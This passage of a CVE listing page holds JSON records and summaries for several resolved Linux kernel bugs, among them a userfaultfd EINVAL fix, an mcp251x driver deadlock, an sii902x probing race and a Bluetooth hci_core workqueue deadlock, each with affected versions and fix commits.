              "lessThan": "cd94cac4069a763ab5206be2c64c9a8beae590ba",
              "status": "affected",
              "version": "e06f1e1dd4998ffc9da37f580703b55a93fc4de4",
              "versionType": "git"
            },
            {
              "lessThan": "8111f902b7c95d75fc80c7e577f5045886c6b384",
              "status": "affected",
              "version": "e06f1e1dd4998ffc9da37f580703b55a93fc4de4",
              "versionType": "git"
            },
            {
              "lessThan": "1723f04caacb32cadc4e063725d836a0c4450694",
              "status": "affected",
              "version": "e06f1e1dd4998ffc9da37f580703b55a93fc4de4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/userfaultfd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nFix userfaultfd_api to return EINVAL as expected\n\nCurrently if we request a feature that is not set in the Kernel config we\nfail silently and return all the available features.  However, the man\npage indicates we should return an EINVAL.\n\nWe need to fix this issue since we can end up with a Kernel warning should\na program request the feature UFFD_FEATURE_WP_UNPOPULATED on a kernel with\nthe config not set with this feature.\n\n [  200.812896] WARNING: CPU: 91 PID: 13634 at mm/memory.c:1660 zap_pte_range+0x43d/0x660\n [  200.820738] Modules linked in:\n [  200.869387] CPU: 91 PID: 13634 Comm: userfaultfd Kdump: loaded Not tainted 6.9.0-rc5+ #8\n [  200.877477] Hardware name: Dell Inc. PowerEdge R6525/0N7YGH, BIOS 2.7.3 03/30/2022\n [  200.885052] RIP: 0010:zap_pte_range+0x43d/0x660"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:24.145Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/519547760f16eae7803d2658d9524bc5ba7a20a7"
        },
        {
          "url": "https://git.kernel.org/stable/c/14875fd5f9bcf60ac5518c63bfb676ade44aa7c6"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd94cac4069a763ab5206be2c64c9a8beae590ba"
        },
        {
          "url": "https://git.kernel.org/stable/c/8111f902b7c95d75fc80c7e577f5045886c6b384"
        },
        {
          "url": "https://git.kernel.org/stable/c/1723f04caacb32cadc4e063725d836a0c4450694"
        }
      ],
      "title": "Fix userfaultfd_api to return EINVAL as expected",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41027",
    "datePublished": "2024-07-29T14:31:43.859Z",
    "dateReserved": "2024-07-12T12:17:45.617Z",
    "dateUpdated": "2025-11-03T21:59:26.365Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46791 (GCVE-0-2024-46791)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:12 – Updated: 2025-11-03 22:18

Title

can: mcp251x: fix deadlock if an interrupt occurs during mcp251x_open

Summary

In the Linux kernel, the following vulnerability has been resolved: can: mcp251x: fix deadlock if an interrupt occurs during mcp251x_open The mcp251x_hw_wake() function is called with the mpc_lock mutex held and disables the interrupt handler so that no interrupts can be processed while waking the device. If an interrupt has already occurred then waiting for the interrupt handler to complete will deadlock because it will be trying to acquire the same mutex. CPU0 CPU1 ---- ---- mcp251x_open() mutex_lock(&priv->mcp_lock) request_threaded_irq() <interrupt> mcp251x_can_ist() mutex_lock(&priv->mcp_lock) mcp251x_hw_wake() disable_irq() <-- deadlock Use disable_irq_nosync() instead because the interrupt handler does everything while holding the mutex so it doesn't matter if it's still running.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3a49b6b1caf5cefc0…
	https://git.kernel.org/stable/c/513c8fc189b52f792…
	https://git.kernel.org/stable/c/f7ab9e14b23a3eac6…
	https://git.kernel.org/stable/c/8fecde9c3f9a4b97b…
	https://git.kernel.org/stable/c/e554113a1cd2a9cfc…
	https://git.kernel.org/stable/c/7dd9c26bd6cf679bc…

Impacted products

Vendor

Product

Version

Linux

Affected: 8ce8c0abcba314e1fe954a1840f6568bf5aef2ef , < 3a49b6b1caf5cefc05264d29079d52c99cb188e0 (git)
Affected: 8ce8c0abcba314e1fe954a1840f6568bf5aef2ef , < 513c8fc189b52f7922e36bdca58997482b198f0e (git)
Affected: 8ce8c0abcba314e1fe954a1840f6568bf5aef2ef , < f7ab9e14b23a3eac6714bdc4dba244d8aa1ef646 (git)
Affected: 8ce8c0abcba314e1fe954a1840f6568bf5aef2ef , < 8fecde9c3f9a4b97b68bb97c9f47e5b662586ba7 (git)
Affected: 8ce8c0abcba314e1fe954a1840f6568bf5aef2ef , < e554113a1cd2a9cfc6c7af7bdea2141c5757e188 (git)
Affected: 8ce8c0abcba314e1fe954a1840f6568bf5aef2ef , < 7dd9c26bd6cf679bcfdef01a8659791aa6487a29 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46791",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:23:49.123031Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:24:01.153Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:34.261Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/can/spi/mcp251x.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3a49b6b1caf5cefc05264d29079d52c99cb188e0",
              "status": "affected",
              "version": "8ce8c0abcba314e1fe954a1840f6568bf5aef2ef",
              "versionType": "git"
            },
            {
              "lessThan": "513c8fc189b52f7922e36bdca58997482b198f0e",
              "status": "affected",
              "version": "8ce8c0abcba314e1fe954a1840f6568bf5aef2ef",
              "versionType": "git"
            },
            {
              "lessThan": "f7ab9e14b23a3eac6714bdc4dba244d8aa1ef646",
              "status": "affected",
              "version": "8ce8c0abcba314e1fe954a1840f6568bf5aef2ef",
              "versionType": "git"
            },
            {
              "lessThan": "8fecde9c3f9a4b97b68bb97c9f47e5b662586ba7",
              "status": "affected",
              "version": "8ce8c0abcba314e1fe954a1840f6568bf5aef2ef",
              "versionType": "git"
            },
            {
              "lessThan": "e554113a1cd2a9cfc6c7af7bdea2141c5757e188",
              "status": "affected",
              "version": "8ce8c0abcba314e1fe954a1840f6568bf5aef2ef",
              "versionType": "git"
            },
            {
              "lessThan": "7dd9c26bd6cf679bcfdef01a8659791aa6487a29",
              "status": "affected",
              "version": "8ce8c0abcba314e1fe954a1840f6568bf5aef2ef",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/can/spi/mcp251x.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: mcp251x: fix deadlock if an interrupt occurs during mcp251x_open\n\nThe mcp251x_hw_wake() function is called with the mpc_lock mutex held and\ndisables the interrupt handler so that no interrupts can be processed while\nwaking the device. If an interrupt has already occurred then waiting for\nthe interrupt handler to complete will deadlock because it will be trying\nto acquire the same mutex.\n\nCPU0                           CPU1\n----                           ----\nmcp251x_open()\n mutex_lock(\u0026priv-\u003emcp_lock)\n  request_threaded_irq()\n                               \u003cinterrupt\u003e\n                               mcp251x_can_ist()\n                                mutex_lock(\u0026priv-\u003emcp_lock)\n  mcp251x_hw_wake()\n   disable_irq() \u003c-- deadlock\n\nUse disable_irq_nosync() instead because the interrupt handler does\neverything while holding the mutex so it doesn\u0027t matter if it\u0027s still\nrunning."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:34:24.903Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3a49b6b1caf5cefc05264d29079d52c99cb188e0"
        },
        {
          "url": "https://git.kernel.org/stable/c/513c8fc189b52f7922e36bdca58997482b198f0e"
        },
        {
          "url": "https://git.kernel.org/stable/c/f7ab9e14b23a3eac6714bdc4dba244d8aa1ef646"
        },
        {
          "url": "https://git.kernel.org/stable/c/8fecde9c3f9a4b97b68bb97c9f47e5b662586ba7"
        },
        {
          "url": "https://git.kernel.org/stable/c/e554113a1cd2a9cfc6c7af7bdea2141c5757e188"
        },
        {
          "url": "https://git.kernel.org/stable/c/7dd9c26bd6cf679bcfdef01a8659791aa6487a29"
        }
      ],
      "title": "can: mcp251x: fix deadlock if an interrupt occurs during mcp251x_open",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46791",
    "datePublished": "2024-09-18T07:12:46.677Z",
    "dateReserved": "2024-09-11T15:12:18.279Z",
    "dateUpdated": "2025-11-03T22:18:34.261Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26607 (GCVE-0-2024-26607)

Vulnerability from cvelistv5 – Published: 2024-02-29 11:47 – Updated: 2025-05-04 08:52

Title

drm/bridge: sii902x: Fix probing race issue

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/bridge: sii902x: Fix probing race issue A null pointer dereference crash has been observed rarely on TI platforms using sii9022 bridge: [ 53.271356] sii902x_get_edid+0x34/0x70 [sii902x] [ 53.276066] sii902x_bridge_get_edid+0x14/0x20 [sii902x] [ 53.281381] drm_bridge_get_edid+0x20/0x34 [drm] [ 53.286305] drm_bridge_connector_get_modes+0x8c/0xcc [drm_kms_helper] [ 53.292955] drm_helper_probe_single_connector_modes+0x190/0x538 [drm_kms_helper] [ 53.300510] drm_client_modeset_probe+0x1f0/0xbd4 [drm] [ 53.305958] __drm_fb_helper_initial_config_and_unlock+0x50/0x510 [drm_kms_helper] [ 53.313611] drm_fb_helper_initial_config+0x48/0x58 [drm_kms_helper] [ 53.320039] drm_fbdev_dma_client_hotplug+0x84/0xd4 [drm_dma_helper] [ 53.326401] drm_client_register+0x5c/0xa0 [drm] [ 53.331216] drm_fbdev_dma_setup+0xc8/0x13c [drm_dma_helper] [ 53.336881] tidss_probe+0x128/0x264 [tidss] [ 53.341174] platform_probe+0x68/0xc4 [ 53.344841] really_probe+0x188/0x3c4 [ 53.348501] __driver_probe_device+0x7c/0x16c [ 53.352854] driver_probe_device+0x3c/0x10c [ 53.357033] __device_attach_driver+0xbc/0x158 [ 53.361472] bus_for_each_drv+0x88/0xe8 [ 53.365303] __device_attach+0xa0/0x1b4 [ 53.369135] device_initial_probe+0x14/0x20 [ 53.373314] bus_probe_device+0xb0/0xb4 [ 53.377145] deferred_probe_work_func+0xcc/0x124 [ 53.381757] process_one_work+0x1f0/0x518 [ 53.385770] worker_thread+0x1e8/0x3dc [ 53.389519] kthread+0x11c/0x120 [ 53.392750] ret_from_fork+0x10/0x20 The issue here is as follows: - tidss probes, but is deferred as sii902x is still missing. - sii902x starts probing and enters sii902x_init(). - sii902x calls drm_bridge_add(). Now the sii902x bridge is ready from DRM's perspective. - sii902x calls sii902x_audio_codec_init() and platform_device_register_data() - The registration of the audio platform device causes probing of the deferred devices. - tidss probes, which eventually causes sii902x_bridge_get_edid() to be called. - sii902x_bridge_get_edid() tries to use the i2c to read the edid. However, the sii902x driver has not set up the i2c part yet, leading to the crash. Fix this by moving the drm_bridge_add() to the end of the sii902x_init(), which is also at the very end of sii902x_probe().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e0f83c234ea7a3dec…
	https://git.kernel.org/stable/c/56f96cf6eb11a1c2d…
	https://git.kernel.org/stable/c/2a4c6af7934a7b4c3…
	https://git.kernel.org/stable/c/08ac6f132dd77e40f…

Impacted products

Vendor

Product

Version

Linux

Affected: 21d808405fe49028036932dd969920f4fee4f481 , < e0f83c234ea7a3dec1f84e5d02caa1c51664a076 (git)
Affected: 21d808405fe49028036932dd969920f4fee4f481 , < 56f96cf6eb11a1c2d594367c3becbfb06a855ec1 (git)
Affected: 21d808405fe49028036932dd969920f4fee4f481 , < 2a4c6af7934a7b4c304542c38fee35e09cc1770c (git)
Affected: 21d808405fe49028036932dd969920f4fee4f481 , < 08ac6f132dd77e40f786d8af51140c96c6d739c9 (git)

Linux

Affected: 5.0
Unaffected: 0 , < 5.0 (semver)
Unaffected: 6.1.76 , ≤ 6.1.* (semver)
Unaffected: 6.6.15 , ≤ 6.6.* (semver)
Unaffected: 6.7.3 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26607",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T16:25:38.354180Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T16:25:48.643Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:07:19.794Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e0f83c234ea7a3dec1f84e5d02caa1c51664a076"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/56f96cf6eb11a1c2d594367c3becbfb06a855ec1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2a4c6af7934a7b4c304542c38fee35e09cc1770c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/08ac6f132dd77e40f786d8af51140c96c6d739c9"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/bridge/sii902x.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e0f83c234ea7a3dec1f84e5d02caa1c51664a076",
              "status": "affected",
              "version": "21d808405fe49028036932dd969920f4fee4f481",
              "versionType": "git"
            },
            {
              "lessThan": "56f96cf6eb11a1c2d594367c3becbfb06a855ec1",
              "status": "affected",
              "version": "21d808405fe49028036932dd969920f4fee4f481",
              "versionType": "git"
            },
            {
              "lessThan": "2a4c6af7934a7b4c304542c38fee35e09cc1770c",
              "status": "affected",
              "version": "21d808405fe49028036932dd969920f4fee4f481",
              "versionType": "git"
            },
            {
              "lessThan": "08ac6f132dd77e40f786d8af51140c96c6d739c9",
              "status": "affected",
              "version": "21d808405fe49028036932dd969920f4fee4f481",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/bridge/sii902x.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.0"
            },
            {
              "lessThan": "5.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.76",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.15",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.76",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.15",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.3",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/bridge: sii902x: Fix probing race issue\n\nA null pointer dereference crash has been observed rarely on TI\nplatforms using sii9022 bridge:\n\n[   53.271356]  sii902x_get_edid+0x34/0x70 [sii902x]\n[   53.276066]  sii902x_bridge_get_edid+0x14/0x20 [sii902x]\n[   53.281381]  drm_bridge_get_edid+0x20/0x34 [drm]\n[   53.286305]  drm_bridge_connector_get_modes+0x8c/0xcc [drm_kms_helper]\n[   53.292955]  drm_helper_probe_single_connector_modes+0x190/0x538 [drm_kms_helper]\n[   53.300510]  drm_client_modeset_probe+0x1f0/0xbd4 [drm]\n[   53.305958]  __drm_fb_helper_initial_config_and_unlock+0x50/0x510 [drm_kms_helper]\n[   53.313611]  drm_fb_helper_initial_config+0x48/0x58 [drm_kms_helper]\n[   53.320039]  drm_fbdev_dma_client_hotplug+0x84/0xd4 [drm_dma_helper]\n[   53.326401]  drm_client_register+0x5c/0xa0 [drm]\n[   53.331216]  drm_fbdev_dma_setup+0xc8/0x13c [drm_dma_helper]\n[   53.336881]  tidss_probe+0x128/0x264 [tidss]\n[   53.341174]  platform_probe+0x68/0xc4\n[   53.344841]  really_probe+0x188/0x3c4\n[   53.348501]  __driver_probe_device+0x7c/0x16c\n[   53.352854]  driver_probe_device+0x3c/0x10c\n[   53.357033]  __device_attach_driver+0xbc/0x158\n[   53.361472]  bus_for_each_drv+0x88/0xe8\n[   53.365303]  __device_attach+0xa0/0x1b4\n[   53.369135]  device_initial_probe+0x14/0x20\n[   53.373314]  bus_probe_device+0xb0/0xb4\n[   53.377145]  deferred_probe_work_func+0xcc/0x124\n[   53.381757]  process_one_work+0x1f0/0x518\n[   53.385770]  worker_thread+0x1e8/0x3dc\n[   53.389519]  kthread+0x11c/0x120\n[   53.392750]  ret_from_fork+0x10/0x20\n\nThe issue here is as follows:\n\n- tidss probes, but is deferred as sii902x is still missing.\n- sii902x starts probing and enters sii902x_init().\n- sii902x calls drm_bridge_add(). Now the sii902x bridge is ready from\n  DRM\u0027s perspective.\n- sii902x calls sii902x_audio_codec_init() and\n  platform_device_register_data()\n- The registration of the audio platform device causes probing of the\n  deferred devices.\n- tidss probes, which eventually causes sii902x_bridge_get_edid() to be\n  called.\n- sii902x_bridge_get_edid() tries to use the i2c to read the edid.\n  However, the sii902x driver has not set up the i2c part yet, leading\n  to the crash.\n\nFix this by moving the drm_bridge_add() to the end of the\nsii902x_init(), which is also at the very end of sii902x_probe()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:52:13.572Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e0f83c234ea7a3dec1f84e5d02caa1c51664a076"
        },
        {
          "url": "https://git.kernel.org/stable/c/56f96cf6eb11a1c2d594367c3becbfb06a855ec1"
        },
        {
          "url": "https://git.kernel.org/stable/c/2a4c6af7934a7b4c304542c38fee35e09cc1770c"
        },
        {
          "url": "https://git.kernel.org/stable/c/08ac6f132dd77e40f786d8af51140c96c6d739c9"
        }
      ],
      "title": "drm/bridge: sii902x: Fix probing race issue",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26607",
    "datePublished": "2024-02-29T11:47:26.439Z",
    "dateReserved": "2024-02-19T14:20:24.130Z",
    "dateUpdated": "2025-05-04T08:52:13.572Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41063 (GCVE-0-2024-41063)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2026-01-05 10:37

Title

Bluetooth: hci_core: cancel all works upon hci_unregister_dev()

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_core: cancel all works upon hci_unregister_dev() syzbot is reporting that calling hci_release_dev() from hci_error_reset() due to hci_dev_put() from hci_error_reset() can cause deadlock at destroy_workqueue(), for hci_error_reset() is called from hdev->req_workqueue which destroy_workqueue() needs to flush. We need to make sure that hdev->{rx_work,cmd_work,tx_work} which are queued into hdev->workqueue and hdev->{power_on,error_reset} which are queued into hdev->req_workqueue are no longer running by the moment destroy_workqueue(hdev->workqueue); destroy_workqueue(hdev->req_workqueue); are called from hci_release_dev(). Call cancel_work_sync() on these work items from hci_unregister_dev() as soon as hdev->list is removed from hci_dev_list.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/48542881997e17b49…
	https://git.kernel.org/stable/c/9cfc84b1d464cc024…
	https://git.kernel.org/stable/c/ddeda6ca5f218b668…
	https://git.kernel.org/stable/c/d2ce562a5aff1dcd0…
	https://git.kernel.org/stable/c/96600c2e5ee8213db…
	https://git.kernel.org/stable/c/d6cbce18370641a21…
	https://git.kernel.org/stable/c/3f939bd73fed12ddd…
	https://git.kernel.org/stable/c/0d151a103775dd964…

Impacted products

Vendor

Product

Version

Linux

Affected: e0b278650f07acf2e0932149183458468a731c03 , < 48542881997e17b49dc16b93fe910e0cfcf7a9f9 (git)
Affected: 98fb98fd37e42fd4ce13ff657ea64503e24b6090 , < 9cfc84b1d464cc024286f42a090718f9067b80ed (git)
Affected: 6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2 , < ddeda6ca5f218b668b560d90fc31ae469adbfd92 (git)
Affected: da4569d450b193e39e87119fd316c0291b585d14 , < d2ce562a5aff1dcd0c50d9808ea825ef90da909f (git)
Affected: 45085686b9559bfbe3a4f41d3d695a520668f5e1 , < 96600c2e5ee8213dbab5df1617293d8e847bb4fa (git)
Affected: 2ab9a19d896f5a0dd386e1f001c5309bc35f433b , < d6cbce18370641a21dd889e8613d8153df15eb39 (git)
Affected: 2449007d3f73b2842c9734f45f0aadb522daf592 , < 3f939bd73fed12dddc2a32a76116c19ca47c7678 (git)
Affected: 2449007d3f73b2842c9734f45f0aadb522daf592 , < 0d151a103775dd9645c78c97f77d6e2a5298d913 (git)
Affected: dd594cdc24f2e48dab441732e6dfcafd6b0711d1 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 4.19.319 , ≤ 4.19.* (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.101 , ≤ 6.1.* (semver)
Unaffected: 6.6.42 , ≤ 6.6.* (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:11.784Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
